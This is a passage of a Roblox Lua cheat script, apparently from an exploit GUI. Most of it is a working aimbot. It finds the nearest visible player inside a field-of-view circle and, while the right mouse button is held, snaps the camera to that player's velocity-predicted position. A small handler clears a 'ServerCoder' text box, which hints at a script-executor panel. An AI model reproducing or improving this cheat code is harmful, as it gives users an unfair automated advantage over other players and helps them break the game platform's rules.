				local function UnLockCursor()
					HoldingM2 = false Active = false Lock = false 
					UIS.MouseBehavior = Enum.MouseBehavior.Default
				end
				function FindNearestPlayer()
					local dist = math.huge
					local Target = nil
					for _, v in pairs(Players:GetPlayers()) do
						if v ~= LocalPlayer and v.Character:FindFirstChild("Humanoid") and v.Character:FindFirstChild("Humanoid").Health > 0 and v.Character:FindFirstChild("HumanoidRootPart") and v then
							local TheirCharacter = v.Character
							local CharacterRoot, Visible = MyView:WorldToViewportPoint(TheirCharacter[_G.AimPart].Position)
							if Visible then
								local RealMag = (Vector2.new(Mouse.X, Mouse.Y) - Vector2.new(CharacterRoot.X, CharacterRoot.Y)).Magnitude
								if RealMag < dist and RealMag < FOVCircle.Radius then
									dist = RealMag
									Target = TheirCharacter
								end
							end
						end
					end
					return Target
				end
	
				UIS.InputBegan:Connect(function(Input)
					if Input.UserInputType == Enum.UserInputType.MouseButton2 then
						HoldingM2 = true
						Active = true
						Lock = true
						if Active then
							local The_Enemy = FindNearestPlayer()
							while HoldingM2 do task.wait(.000001)
								if Lock and The_Enemy ~= nil then
									local Future = The_Enemy.HumanoidRootPart.CFrame + (The_Enemy.HumanoidRootPart.Velocity * Epitaph + HeadOffset)
									MyView.CFrame = CFrame.lookAt(MyView.CFrame.Position, Future.Position)
									CursorLock()
								end
							end
						end
					end
				end)
				UIS.InputEnded:Connect(function(Input)
					if Input.UserInputType == Enum.UserInputType.MouseButton2 then
						UnLockCursor()
					end
				end)
				game.StarterGui:SetCore("SendNotification", {Title = "Working.", Text = "Success, Script Loaded.", Duration = 4,})
			end)
		end
		coroutine.wrap(VYEUGJP_fake_script)()
	
	end)
end
coroutine.wrap(IZNPI_fake_script)()
local function NWTE_fake_script() -- Clear_2.LocalScript 
	local script = Instance.new('LocalScript', Clear_2)

	local clear = script.Parent
	local servercoder = script.Parent.Parent.ServerCoder
	clear.MouseButton1Click:Connect(function()
		servercoder.Text = ""
	end)
end
coroutine.wrap(NWTE_fake_script)()
